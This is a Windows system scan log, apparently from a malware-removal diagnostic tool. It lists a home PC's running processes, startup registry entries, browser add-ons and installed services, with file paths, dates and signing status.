(Juniper Networks, Inc.) C:\Program Files (x86)\Juniper Networks\Common Files\dsNcService.exe
(Sourcefire, Inc.) C:\Program Files\Immunet\3.1.13\sfc.exe
(Immunet) C:\Program Files\Immunet\3.1.13\iptray.exe
(Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe
() C:\Program Files (x86)\HTC\Internet Pass-Through\PassThruSvr.exe
(Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe
(Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe
(Skype Technologies S.A.) C:\ProgramData\Skype\Toolbars\Skype C2C Service\c2c_service.exe
(TeamViewer GmbH) C:\Program Files (x86)\TeamViewer\Version9\TeamViewer_Service.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(TeamViewer GmbH) C:\Program Files (x86)\TeamViewer\Version9\TeamViewer.exe
(TeamViewer GmbH) C:\Program Files (x86)\TeamViewer\Version9\tv_w32.exe
(TeamViewer GmbH) C:\Program Files (x86)\TeamViewer\Version9\tv_x64.exe
(CyberLink) C:\Program Files (x86)\Hewlett-Packard\TouchSmart\Media\Kernel\CLML\CLMLSvc.exe
(CyberLink Corp.) C:\Program Files (x86)\Hewlett-Packard\Media\DVD\DVDAgent.exe
(TeamViewer GmbH) C:\Program Files (x86)\TeamViewer\Version9\TeamViewer_Desktop.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
 
 
==================== Registry (Whitelisted) ==================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM-x32\...\Run: [] => [X]
HKLM-x32\...\Run: [Immunet Protect] => C:\Program Files\Immunet\3.1.13\iptray.exe [3232464 2014-09-03] (Immunet)
HKLM-x32\...\Run: [SDTray] => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe [4101576 2014-06-24] (Safer-Networking Ltd.)
Winlogon\Notify\igfxcui: C:\Windows\system32\igfxdev.dll (Intel Corporation)
Winlogon\Notify\SDWinLogon-x32: SDWinLogon.dll [X]
BootExecute: autocheck autochk * sdnclean64.exe
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.msn.com/
SearchScopes: HKLM - {872E3F13-5682-407C-916D-A06C2195FC62} URL = http://www.ask.com/web?q={searchterms}&l=dis&o=ushpd
SearchScopes: HKLM-x32 - {872E3F13-5682-407C-916D-A06C2195FC62} URL = http://www.ask.com/web?q={searchterms}&l=dis&o=ushpd
SearchScopes: HKCU - {872E3F13-5682-407C-916D-A06C2195FC62} URL = 
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO: Skype add-on for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll (Skype Technologies S.A.)
BHO: Adblock Plus for IE Browser Helper Object -> {FFCB3198-32F3-4E8B-9539-4324694ED664} -> C:\Program Files\Adblock Plus for IE\AdblockPlus64.dll (Adblock Plus)
BHO-x32: Adobe PDF Link Helper -> {18DF081C-E8AD-4283-A596-FA578C2EBDC3} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll (Adobe Systems Incorporated)
BHO-x32: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files (x86)\Microsoft Office\Office12\GrooveShellExtensions.dll (Microsoft Corporation)
BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO-x32: Windows Live Messenger Companion Helper -> {9FDDE16B-836F-4806-AB1F-1455CBEFF289} -> C:\Program Files (x86)\Windows Live\Companion\companioncore.dll (Microsoft Corporation)
BHO-x32: Skype Browser Helper -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\skypeieplugin.dll (Skype Technologies S.A.)
BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre6\bin\jp2ssv.dll (Sun Microsystems, Inc.)
BHO-x32: Adblock Plus for IE Browser Helper Object -> {FFCB3198-32F3-4E8B-9539-4324694ED664} -> C:\Program Files\Adblock Plus for IE\AdblockPlus32.dll (Adblock Plus)
Toolbar: HKCU - No Name - {604BC32A-9680-40D1-9AC6-E06B23A1BA4C} -  No File
Toolbar: HKCU - No Name - {5BED3930-2E9E-76D8-BACC-80DF2188D455} -  No File
Toolbar: HKCU - No Name - {2318C2B1-4965-11D4-9B18-009027A5CD4F} -  No File
DPF: HKLM {AA570693-00E2-4907-B6F1-60A1199B030C} https://juniper.net/dana-cached/sc/JuniperSetupClient64.cab
DPF: HKLM-x32 {1239CC52-59EF-4DFA-8C61-90FFA846DF7E} http://www.musicnotes.com/download/mnviewer.cab
DPF: HKLM-x32 {166B1BCA-3F9C-11CF-8075-444553540000} http://download.macromedia.com/pub/shockwave/cabs/director/sw.cab
DPF: HKLM-x32 {3107C2A8-9F0B-4404-A58B-21BD85268FBC} http://www.pogo.com/cdl/launcher/PogoWebLauncherInstaller.CAB
DPF: HKLM-x32 {A8F2B9BD-A6A0-486A-9744-18920D898429} http://www.sibelius.com/download/software/win/ActiveXPlugin.cab
DPF: HKLM-x32 {DF780F87-FF2B-4DF8-92D0-73DB16A1543A} http://games.pogo.com/online2/pogo/bejeweled2/popcaploader_v6.cab
DPF: HKLM-x32 {E2883E8F-472F-4FB0-9522-AC9BF37916A7} http://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab
DPF: HKLM-x32 {F27237D7-93C8-44C2-AC6E-D6057B9A918F} https://hscvpn.uthscsa.edu/dana-cached/sc/JuniperSetupClient.cab
Handler: skype-ie-addon-data - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll (Skype Technologies S.A.)
Handler-x32: skype-ie-addon-data - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\skypeieplugin.dll (Skype Technologies S.A.)
Handler-x32: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll (Skype Technologies)
Tcpip\Parameters: [DhcpNameServer] 192.168.1.254
 
FireFox:
========
FF ProfilePath: C:\Users\Camille\AppData\Roaming\Mozilla\Firefox\Profiles\cc3diwjc.default
FF NewTab: hxxp://www.google.com/
FF SelectedSearchEngine: Google
FF Homepage: about:home
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_11_7_700_224.dll ()
FF Plugin: @microsoft.com/GENUINE -> disabled No File
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_11_7_700_224.dll ()
FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\Windows\system32\Adobe\Director\np32dsw.dll No File
FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll ()
FF Plugin-x32: @java.com/JavaPlugin -> C:\Program Files (x86)\Java\jre6\bin\new_plugin\npjp2.dll (Sun Microsystems, Inc.)
FF Plugin-x32: @microsoft.com/GENUINE -> disabled No File
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3538.0513 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @Motive.com/NpMotive,version=1.0 -> C:\Program Files (x86)\Common Files\Motive\npMotive.dll (Alcatel-Lucent)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF Plugin HKCU: @citrixonline.com/appdetectorplugin -> C:\Users\Camille\AppData\Local\Citrix\Plugins\104\npappdetector.dll (Citrix Online)
FF Extension: Adblock Plus - C:\Users\Camille\AppData\Roaming\Mozilla\Firefox\Profiles\cc3diwjc.default\Extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi [2014-09-21]
FF HKLM-x32\...\Firefox\Extensions: [{7BA52691-1876-45ce-9EE6-54BCB3B04BBC}] - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\Norton\coFFPlgn
FF HKCU\...\Firefox\Extensions: [{C1D6A6A4-A151-4A29-9D94-0CE53B5BC862}] - C:\Users\Camille\AppData\Local\{C1D6A6A4-A151-4A29-9D94-0CE53B5BC862}
FF Extension: XULRunner - C:\Users\Camille\AppData\Local\{C1D6A6A4-A151-4A29-9D94-0CE53B5BC862} [2011-08-14]
 
Chrome: 
=======
CHR HKLM-x32\...\Chrome\Extension: [penmcajcdddmkfidjjpffbmnjfoofcda] - C:\ProgramData\Codec-V\penmcajcdddmkfidjjpffbmnjfoofcda.crx []
 
==================== Services (Whitelisted) =================
 
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
 
R3 AeLookupSvc; C:\Windows\System32\aelupsvc.dll [72192 2009-07-13] (Microsoft Corporation) [File not signed]
S3 ALG; C:\Windows\System32\alg.exe [79360 2009-07-13] (Microsoft Corporation) [File not signed]
S3 AppIDSvc; C:\Windows\System32\appidsvc.dll [32256 2009-07-13] (Microsoft Corporation) [File not signed]
S3 Appinfo; C:\Windows\System32\appinfo.dll [70144 2013-02-27] (Microsoft Corporation) [File not signed]
R2 AudioEndpointBuilder; C:\Windows\System32\Audiosrv.dll [679424 2010-11-20] (Microsoft Corporation) [File not signed]
R2 AudioSrv; C:\Windows\System32\Audiosrv.dll [679424 2010-11-20] (Microsoft Corporation) [File not signed]
S3 AxInstSV; C:\Windows\System32\AxInstSV.dll [114688 2010-11-20] (Microsoft Corporation) [File not signed]
S3 BDESVC; C:\Windows\System32\bdesvc.dll [100864 2009-07-13] (Microsoft Corporation) [File not signed]
R2 BFE; C:\Windows\System32\bfe.dll [705024 2010-11-20] (Microsoft Corporation) [File not signed]
R2 BITS; C:\Windows\System32\qmgr.dll [849920 2010-11-20] (Microsoft Corporation) [File not signed]
R2 Browser; C:\Windows\System32\browser.dll [136704 2012-07-04] (Microsoft Corporation) [File not signed]
S3 bthserv; C:\Windows\system32\bthserv.dll [83968 2009-07-13] (Microsoft Corporation) [File not signed]
S3 CertPropSvc; C:\Windows\System32\certprop.dll [80384 2010-11-20] (Microsoft Corporation) [File not signed]
S3 COMSysApp; C:\Windows\system32\dllhost.exe [9728 2009-07-13] (Microsoft Corporation) [File not signed]
S3 COMSysApp; C:\Windows\SysWOW64\dllhost.exe [7168 2009-07-13] (Microsoft Corporation) [File not signed]
R2 CryptSvc; C:\Windows\system32\cryptsvc.dll [184320 2013-07-09] (Microsoft Corporation) [File not signed]
R2 CryptSvc; C:\Windows\SysWOW64\cryptsvc.dll [140288 2013-07-08] (Microsoft Corporation) [File not signed]
R2 DcomLaunch; C:\Windows\system32\rpcss.dll [512000 2010-11-20] (Microsoft Corporation) [File not signed]
S3 defragsvc; C:\Windows\System32\defragsvc.dll [291328 2009-07-13] (Microsoft Corporation) [File not signed]
R2 Dhcp; C:\Windows\system32\dhcpcore.dll [317952 2010-11-20] (Microsoft Corporation) [File not signed]
R2 Dhcp; C:\Windows\SysWOW64\dhcpcore.dll [254464 2010-11-20] (Microsoft Corporation) [File not signed]
R2 Dnscache; C:\Windows\System32\dnsrslvr.dll [183296 2011-03-03] (Microsoft Corporation) [File not signed]
S3 dot3svc; C:\Windows\System32\dot3svc.dll [252416 2010-11-20] (Microsoft Corporation) [File not signed]
R2 DPS; C:\Windows\system32\dps.dll [162816 2010-11-20] (Microsoft Corporation) [File not signed]
S3 EapHost; C:\Windows\System32\eapsvc.dll [111104 2009-07-13] (Microsoft Corporation) [File not signed]
S3 EFS; C:\Windows\System32\lsass.exe [31232 2014-04-11] (Microsoft Corporation) [File not signed]
S3 ehRecvr; C:\Windows\ehome\ehRecvr.exe [696832 2010-11-20] (Microsoft Corporation) [File not signed]
S3 ehSched; C:\Windows\ehome\ehsched.exe [127488 2009-07-13] (Microsoft Corporation) [File not signed]
R2 eventlog; C:\Windows\System32\wevtsvc.dll [1646080 2010-11-20] (Microsoft Corporation) [File not signed]
R2 EventSystem; C:\Windows\system32\es.dll [402944 2009-07-13] (Microsoft Corporation) [File not signed]
R2 EventSystem; C:\Windows\SysWOW64\es.dll [271360 2009-07-13] (Microsoft Corporation) [File not signed]
S3 Fax; C:\Windows\system32\fxssvc.exe [689152 2010-11-20] (Microsoft Corporation) [File not signed]
R3 fdPHost; C:\Windows\system32\fdPHost.dll [16384 2009-07-13] (Microsoft Corporation) [File not signed]
R3 FDResPub; C:\Windows\system32\fdrespub.dll [34816 2009-07-13] (Microsoft Corporation) [File not signed]
R2 FontCache; C:\Windows\system32\FntCache.dll [1175552 2013-01-13] (Microsoft Corporation) [File not signed]
R2 gpsvc; C:\Windows\System32\gpsvc.dll [777728 2010-11-20] (Microsoft Corporation) [File not signed]
R3 hidserv; C:\Windows\System32\hidserv.dll [38912 2009-07-13] (Microsoft Corporation) [File not signed]
R3 hidserv; C:\Windows\SysWOW64\hidserv.dll [49152 2009-07-13] (Microsoft Corporation) [File not signed]
S3 hkmsvc; C:\Windows\system32\kmsvc.dll [90624 2010-11-20] (Microsoft Corporation) [File not signed]
R3 HomeGroupListener; C:\Windows\system32\ListSvc.dll [232448 2010-11-20] (Microsoft Corporation) [File not signed]
R3 HomeGroupProvider; C:\Windows\system32\provsvc.dll [187904 2010-11-20] (Microsoft Corporation) [File not signed]
R3 HomeGroupProvider; C:\Windows\SysWOW64\provsvc.dll [165376 2010-11-20] (Microsoft Corporation) [File not signed]
S3 IEEtwCollectorService; C:\Windows\system32\IEEtwCollector.exe [111616 2014-07-25] (Microsoft Corporation) [File not signed]
R2 IKEEXT; C:\Windows\System32\ikeext.dll [859648 2013-10-11] (Microsoft Corporation) [File not signed]
R2 ImmunetProtect; C:\Program Files\Immunet\3.1.13\sfc.exe [546208 2014-09-03] (Sourcefire, Inc.)
S3 IPBusEnum; C:\Windows\system32\ipbusenum.dll [101888 2009-07-13] (Microsoft Corporation) [File not signed]
S3 KeyIso; C:\Windows\system32\lsass.exe [31232 2014-04-11] (Microsoft Corporation) [File not signed]
S3 KtmRm; C:\Windows\system32\msdtckrm.dll [368640 2009-07-13] (Microsoft Corporation) [File not signed]
R2 LanmanServer; C:\Windows\System32\srvsvc.dll [236032 2010-11-20] (Microsoft Corporation) [File not signed]
R2 LanmanWorkstation; C:\Windows\System32\wkssvc.dll [118784 2010-11-20] (Microsoft Corporation) [File not signed]
S4 LightScribeService; c:\Program Files (x86)\Common Files\LightScribe\LSSrvc.exe [73728 2009-05-18] (Hewlett-Packard Company) [File not signed]
S3 lltdsvc; C:\Windows\System32\lltdsvc.dll [300032 2009-07-13] (Microsoft Corporation) [File not signed]
R2 lmhosts; C:\Windows\System32\lmhsvc.dll [23552 2009-07-13] (Microsoft Corporation) [File not signed]
S4 McciCMService; C:\Program Files (x86)\Common Files\Motive\McciCMService.exe [319488 2010-11-08] (Alcatel-Lucent) [File not signed]
S4 McciCMService64; C:\Program Files\Common Files\Motive\McciCMService.exe [517632 2010-11-08] (Alcatel-Lucent) [File not signed]
S4 Mcx2Svc; C:\Windows\system32\Mcx2Svc.dll [84992 2010-11-20] (Microsoft Corporation) [File not signed]
R2 MMCSS; C:\Windows\system32\mmcss.dll [67584 2009-07-13] (Microsoft Corporation) [File not signed]
R2 MpsSvc; C:\Windows\system32\mpssvc.dll [828416 2010-11-20] (Microsoft Corporation) [File not signed]
S3 MSDTC; C:\Windows\System32\msdtc.exe [141824 2009-07-13] (Microsoft Corporation) [File not signed]
S3 MSiSCSI; C:\Windows\system32\iscsiexe.dll [156672 2009-07-13] (Microsoft Corporation) [File not signed]
S3 msiserver; C:\Windows\System32\msiexec.exe [128000 2010-11-20] (Microsoft Corporation) [File not signed]
S3 msiserver; C:\Windows\SysWOW64\msiexec.exe [73216 2010-11-20] (Microsoft Corporation) [File not signed]
S2 MsMpSvc; c:\Program Files\Microsoft Security Client\Antimalware\MsMpEng.exe [12784 2011-04-27] (Microsoft Corporation)
S3 napagent; C:\Windows\system32\qagentRT.dll [476160 2010-11-20] (Microsoft Corporation) [File not signed]
S3 Netlogon; C:\Windows\system32\lsass.exe [31232 2014-04-11] (Microsoft Corporation) [File not signed]
R3 Netman; C:\Windows\System32\netman.dll [360448 2009-07-13] (Microsoft Corporation) [File not signed]
R3 netprofm; C:\Windows\System32\netprofm.dll [459776 2009-07-13] (Microsoft Corporation) [File not signed]
R3 netprofm; C:\Windows\SysWOW64\netprofm.dll [360448 2009-07-13] (Microsoft Corporation) [File not signed]
S3 NisSrv; c:\Program Files\Microsoft Security Client\Antimalware\NisSrv.exe [288272 2011-04-27] (Microsoft Corporation)
R2 NlaSvc; C:\Windows\System32\nlasvc.dll [303104 2012-10-03] (Microsoft Corporation) [File not signed]
R2 nsi; C:\Windows\system32\nsisvc.dll [25600 2009-07-13] (Microsoft Corporation) [File not signed]
R3 p2pimsvc; C:\Windows\system32\pnrpsvc.dll [327168 2009-07-13] (Microsoft Corporation) [File not signed]
R3 p2psvc; C:\Windows\system32\p2psvc.dll [438784 2009-07-13] (Microsoft Corporation) [File not signed]
R2 PassThru Service; C:\Program Files (x86)\HTC\Internet Pass-Through\PassThruSvr.exe [167424 2012-12-07] () [File not signed]
R2 PcaSvc; C:\Windows\System32\pcasvc.dll [186368 2009-07-13] (Microsoft Corporation) [File not signed]
S3 PerfHost; C:\Windows\SysWow64\perfhost.exe [20992 2009-07-13] (Microsoft Corporation) [File not signed]
S3 pla; C:\Windows\system32\pla.dll [1389056 2010-11-20] (Microsoft Corporation) [File not signed]
S3 pla; C:\Windows\SysWOW64\pla.dll [1508864 2010-11-20] (Microsoft Corporation) [File not signed]
R2 PlugPlay; C:\Windows\system32\umpnpmgr.dll [404480 2011-05-24] (Microsoft Corporation) [File not signed]
S3 PNRPAutoReg; C:\Windows\system32\pnrpauto.dll [25088 2009-07-13] (Microsoft Corporation) [File not signed]
R3 PNRPsvc; C:\Windows\system32\pnrpsvc.dll [327168 2009-07-13] (Microsoft Corporation) [File not signed]
S3 PolicyAgent; C:\Windows\System32\ipsecsvc.dll [501248 2010-11-20] (Microsoft Corporation) [File not signed]
R2 Power; C:\Windows\system32\umpo.dll [163840 2009-07-13] (Microsoft Corporation) [File not signed]
R2 ProfSvc; C:\Windows\system32\profsvc.dll [209920 2012-05-01] (Microsoft Corporation) [File not signed]
S3 ProtectedStorage; C:\Windows\system32\lsass.exe [31232 2014-04-11] (Microsoft Corporation) [File not signed]
S3 QWAVE; C:\Windows\system32\qwave.dll [242688 2009-07-13] (Microsoft Corporation) [File not signed]
S3 RasAuto; C:\Windows\System32\rasauto.dll [99328 2009-07-13] (Microsoft Corporation) [File not signed]
R3 RasMan; C:\Windows\System32\rasmans.dll [344064 2010-11-20] (Microsoft Corporation) [File not signed]
S4 RemoteAccess; C:\Windows\System32\mprdim.dll [97792 2009-07-13] (Microsoft Corporation) [File not signed]
S4 RemoteAccess; C:\Windows\SysWOW64\mprdim.dll [75264 2009-07-13] (Microsoft Corporation) [File not signed]
S3 RemoteRegistry; C:\Windows\system32\regsvc.dll [159232 2009-07-13] (Microsoft Corporation) [File not signed]
R2 RpcEptMapper; C:\Windows\System32\RpcEpMap.dll [67072 2009-07-13] (Microsoft Corporation) [File not signed]
S3 RpcLocator; C:\Windows\system32\locator.exe [10240 2009-07-13] (Microsoft Corporation) [File not signed]
R2 RpcSs; C:\Windows\system32\rpcss.dll [512000 2010-11-20] (Microsoft Corporation) [File not signed]
R2 SamSs; C:\Windows\system32\lsass.exe [31232 2014-04-11] (Microsoft Corporation) [File not signed]
S3 scan; C:\Program Files\Immunet\tetra\scan.dll [447744 2014-09-03] (BitDefender)
S3 SCardSvr; C:\Windows\System32\SCardSvr.dll [190976 2009-07-13] (Microsoft Corporation) [File not signed]
R2 Schedule; C:\Windows\system32\schedsvc.dll [1110016 2010-11-20] (Microsoft Corporation) [File not signed]
S3 SCPolicySvc; C:\Windows\System32\certprop.dll [80384 2010-11-20] (Microsoft Corporation) [File not signed]
R3 SDRSVC; C:\Windows\System32\SDRSVC.dll [170496 2010-11-20] (Microsoft Corporation) [File not signed]
R2 SDScannerService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe [1738168 2014-06-24] (Safer-Networking Ltd.)
R2 SDUpdateService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe [2088408 2014-06-27] (Safer-Networking Ltd.)
R2 SDWSCService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe [171928 2014-04-25] (Safer-Networking Ltd.)
R2 seclogon; C:\Windows\system32\seclogon.dll [30720 2010-11-20] (Microsoft Corporation) [File not signed]
R2 SENS; C:\Windows\System32\sens.dll [64512 2009-07-13] (Microsoft Corporation) [File not signed]
R2 SENS; C:\Windows\SysWOW64\sens.dll [49664 2009-07-13] (Microsoft Corporation) [File not signed]
S3 SensrSvc; C:\Windows\system32\sensrsvc.dll [29184 2009-07-13] (Microsoft Corporation) [File not signed]
S3 SessionEnv; C:\Windows\system32\sessenv.dll [121856 2010-11-20] (Microsoft Corporation) [File not signed]
S3 SessionEnv; C:\Windows\SysWOW64\sessenv.dll [113664 2010-11-20] (Microsoft Corporation) [File not signed]
S2 SharedAccess; C:\Windows\System32\ipnathlp.dll [359424 2009-07-13] (Microsoft Corporation) [File not signed]
R2 ShellHWDetection; C:\Windows\System32\shsvcs.dll [370688 2010-11-20] (Microsoft Corporation) [File not signed]
R2 ShellHWDetection; C:\Windows\SysWOW64\shsvcs.dll [328192 2010-11-20] (Microsoft Corporation) [File not signed]
S3 SNMPTRAP; C:\Windows\System32\snmptrap.exe [14336 2009-07-13] (Microsoft Corporation) [File not signed]
R2 Spooler; C:\Windows\System32\spoolsv.exe [559104 2012-02-11] (Microsoft Corporation) [File not signed]
R2 sppsvc; C:\Windows\system32\sppsvc.exe [3524608 2010-11-20] (Microsoft Corporation) [File not signed]
S3 sppuinotify; C:\Windows\system32\sppuinotify.dll [65536 2009-07-13] (Microsoft Corporation) [File not signed]
R3 SSDPSRV; C:\Windows\System32\ssdpsrv.dll [193024 2009-07-13] (Microsoft Corporation) [File not signed]
R3 SstpSvc; C:\Windows\system32\sstpsvc.dll [75264 2009-07-13] (Microsoft Corporation) [File not signed]
R2 stisvc; C:\Windows\System32\wiaservc.dll [580096 2010-11-20] (Microsoft Corporation) [File not signed]
S3 swprv; C:\Windows\System32\swprv.dll [524288 2009-07-13] (Microsoft Corporation) [File not signed]
R2 SysMain; C:\Windows\system32\sysmain.dll [1743360 2010-11-20] (Microsoft Corporation) [File not signed]
S3 TabletInputService; C:\Windows\System32\TabSvc.dll [92672 2010-11-20] (Microsoft Corporation) [File not signed]
R3 TapiSrv; C:\Windows\System32\tapisrv.dll [316928 2010-11-20] (Microsoft Corporation) [File not signed]
R3 TapiSrv; C:\Windows\SysWOW64\tapisrv.dll [242176 2010-11-20] (Microsoft Corporation) [File not signed]
S3 TBS; C:\Windows\System32\tbssvc.dll [65536 2009-07-13] (Microsoft Corporation) [File not signed]
S3 TermService; C:\Windows\System32\termsrv.dll [680960 2010-11-20] (Microsoft Corporation) [File not signed]
R2 Themes; C:\Windows\system32\themeservice.dll [44544 2009-07-13] (Microsoft Corporation) [File not signed]
S3 THREADORDER; C:\Windows\system32\mmcss.dll [67584 2009-07-13] (Microsoft Corporation) [File not signed]
R2 TrkWks; C:\Windows\System32\trkwks.dll [119808 2009-07-13] (Microsoft Corporation) [File not signed]
S3 TrustedInstaller; C:\Windows\servicing\TrustedInstaller.exe [194048 2010-11-20] (Microsoft Corporation) [File not signed]
S3 UI0Detect; C:\Windows\system32\UI0Detect.exe [40960 2009-07-13] (Microsoft Corporation) [File not signed]
R3 upnphost; C:\Windows\System32\upnphost.dll [353792 2009-07-13] (Microsoft Corporation) [File not signed]
R3 upnphost; C:\Windows\SysWOW64\upnphost.dll [266752 2009-07-13] (Microsoft Corporation) [File not signed]
R2 UxSms; C:\Windows\System32\uxsms.dll [38912 2009-07-13] (Microsoft Corporation) [File not signed]
S3 VaultSvc; C:\Windows\system32\lsass.exe [31232 2014-04-11] (Microsoft Corporation) [File not signed]
S3 vds; C:\Windows\System32\vds.exe [533504 2010-11-20] (Microsoft Corporation) [File not signed]
S3 VSS; C:\Windows\system32\vssvc.exe [1600512 2010-11-20] (Microsoft Corporation) [File not signed]
S3 W32Time; C:\Windows\system32\w32time.dll [381952 2009-07-13] (Microsoft Corporation) [File not signed]
S3 wbengine; C:\Windows\system32\wbengine.exe [1504256 2010-11-20] (Microsoft Corporation) [File not signed]
S3 WbioSrvc; C:\Windows\System32\wbiosrvc.dll [202240 2009-07-13] (Microsoft Corporation) [File not signed]
S3 wcncsvc; C:\Windows\System32\wcncsvc.dll [367104 2010-11-20] (Microsoft Corporation) [File not signed]
S3 wcncsvc; C:\Windows\SysWOW64\wcncsvc.dll [276992 2010-11-20] (Microsoft Corporation) [File not signed]
S3 WcsPlugInService; C:\Windows\System32\WcsPlugInService.dll [40960 2009-07-13] (Microsoft Corporation) [File not signed]
S3 WcsPlugInService; C:\Windows\SysWOW64\WcsPlugInService.dll [32768 2009-07-13] (Microsoft Corporation) [File not signed]
R3 WdiServiceHost; C:\Windows\system32\wdi.dll [90624 2009-07-13] (Microsoft Corporation) [File not signed]
R3 WdiServiceHost; C:\Windows\SysWOW64\wdi.dll [76288 2009-07-13] (Microsoft Corporation) [File not signed]
R3 WdiSystemHost; C:\Windows\system32\wdi.dll [90624 2009-07-13] (Microsoft Corporation) [File not signed]
R3 WdiSystemHost; C:\Windows\SysWOW64\wdi.dll [76288 2009-07-13] (Microsoft Corporation) [File not signed]
S3 WebClient; C:\Windows\System32\webclnt.dll [259584 2013-07-04] (Microsoft Corporation) [File not signed]
S3 WebClient; C:\Windows\SysWOW64\webclnt.dll [205824 2013-07-04] (Microsoft Corporation) [File not signed]
S3 Wecsvc; C:\Windows\system32\wecsvc.dll [237568 2009-07-13] (Microsoft Corporation) [File not signed]
S3 wercplsupport; C:\Windows\System32\wercplsupport.dll [84480 2009-07-13] (Microsoft Corporation) [File not signed]
S3 WerSvc; C:\Windows\System32\WerSvc.dll [76800 2009-07-13] (Microsoft Corporation) [File not signed]
S2 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2013-05-27] (Microsoft Corporation) [File not signed]
R3 WinHttpAutoProxySvc; C:\Windows\system32\winhttp.dll [444416 2010-11-20] (Microsoft Corporation) [File not signed]
R3 WinHttpAutoProxySvc; C:\Windows\SysWOW64\winhttp.dll [351232 2010-11-20] (Microsoft Corporation) [File not signed]
R2 Winmgmt; C:\Windows\system32\wbem\WMIsvc.dll [242688 2009-07-13] (Microsoft Corporation) [File not signed]
S3 WinRM; C:\Windows\system32\WsmSvc.dll [2018304 2010-11-20] (Microsoft Corporation) [File not signed]
S3 WinRM; C:\Windows\SysWOW64\WsmSvc.dll [1175040 2010-11-20] (Microsoft Corporation) [File not signed]
S3 Wlansvc; C:\Windows\System32\wlansvc.dll [886784 2009-07-13] (Microsoft Corporation) [File not signed]
S3 wmiApSrv; C:\Windows\system32\wbem\WmiApSrv.exe [203264 2009-07-13] (Microsoft Corporation) [File not signed]
R2 WMPNetworkSvc; C:\Program Files\Windows Media Player\wmpnetwk.exe [1525248 2010-11-20] (Microsoft Corporation) [File not signed]
S3 WPCSvc; C:\Windows\System32\wpcsvc.dll [12288 2009-07-13] (Microsoft Corporation) [File not signed]
S3 WPCSvc; C:\Windows\SysWOW64\wpcsvc.dll [10752 2009-07-13] (Microsoft Corporation) [File not signed]
R3 WPDBusEnum; C:\Windows\system32\wpdbusenum.dll [117248 2010-11-20] (Microsoft Corporation) [File not signed]
R2 wscsvc; C:\Windows\system32\wscsvc.dll [97280 2009-07-13] (Microsoft Corporation) [File not signed]
S2 WSearch; C:\Windows\system32\SearchIndexer.exe [591872 2011-05-04] (Microsoft Corporation) [File not signed]
S2 WSearch; C:\Windows\SysWOW64\SearchIndexer.exe [427520 2011-05-03] (Microsoft Corporation) [File not signed]
R3 wudfsvc; C:\Windows\System32\WUDFSvc.dll [84992 2012-07-25] (Microsoft Corporation) [File not signed]
